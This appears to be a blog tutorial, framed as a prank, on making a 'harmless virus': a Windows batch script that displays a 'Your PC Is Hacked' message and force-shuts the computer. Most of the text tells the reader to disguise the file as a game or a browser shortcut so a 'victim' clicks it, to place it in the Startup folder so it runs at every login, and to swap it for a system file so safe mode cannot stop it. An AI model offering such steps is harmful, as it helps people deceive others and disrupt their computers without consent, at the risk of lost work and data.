How to Make Harmless Virus For Beginners...
Paste This Code in Notepad 📒
@echo offecho Message here.shutdown -s -f -t 60 -c "Your PC Is Hacked Your PC Will Shutdown Now... ."
Save with any file 📂 name.
But Most important save file as .bat name.. I.e
Game.bat
Optional - : Change file icon
Right click on the desktop and go over to "New," then click "Shortcut".
For the location of the shortcut, choose your virus
Give the shortcut a name that your victim will or might click on.
Right click on the shortcut you have just made and choose "Properties".
Click on the "Choose icon" button and scroll through the list of icons.
Choose an icon that the name of your file. Click on it and hit "OK" twice.
Now if your victim Open File there is messege you choose in program...
________________________
Explain Code
S is for shutdown, F for force, T for timer, and C to do a message.
________________________
Tips
Do not shutdown the computer too early. It may not scare the victim or may not look like a virus.
Alternatively, set your 'virus' to execute every time a user logs in. Navigate to Start > All Programs > Startup (Right-click) > Open and copy the shortcut into the folder that opens. Be careful with the shutdown timer's value. Too long of an interval will make it easy for even the most computer illiterate people to deactivate the virus.
It's even better if you name the virus after an internet browser like "Internet Explorer" or "Google Chrome" and change the icon to match. Save it to your desktop and delete the old internet shortcut so if they click to go on the internet, it shuts down on them.
A safe mode boot will halt the Startup and the Registry Run key. But you can convert bat file to exe then replace a system file by it.
If you really screwed up, boot a Live Linux distro and mount the hard drive. Once mounted, navigate to that directory and delete the file.
Running batch files like these in full screen can make them even scarier and more convincing. Right click on the icon and choose Properties -> Options -> Full screen.
Alternatively, Choose a random shortcut icon from the desktop (Chrome for example) and change its target path to your batch file using properties. Whenever the user tries to open the software, the computer will shutdown.
_______________________
Warnings
If you use a shutdown-countdown, you should have enough time to abort the countdown.
Do not execute such viruses on computers that must be available 24 hours a day, such as the ones in hospitals.
Only do this to someone who can handle such a prank!
Some antiviruses will detect this as a virus
Once this virus has been clicked on, there is often no way to stop it. However, if you need to terminate the shutdown for whatever reason, go to command prompt and type in this following command: "shutdown /a". It will immediately terminate the fake virus
Comments
Post a Comment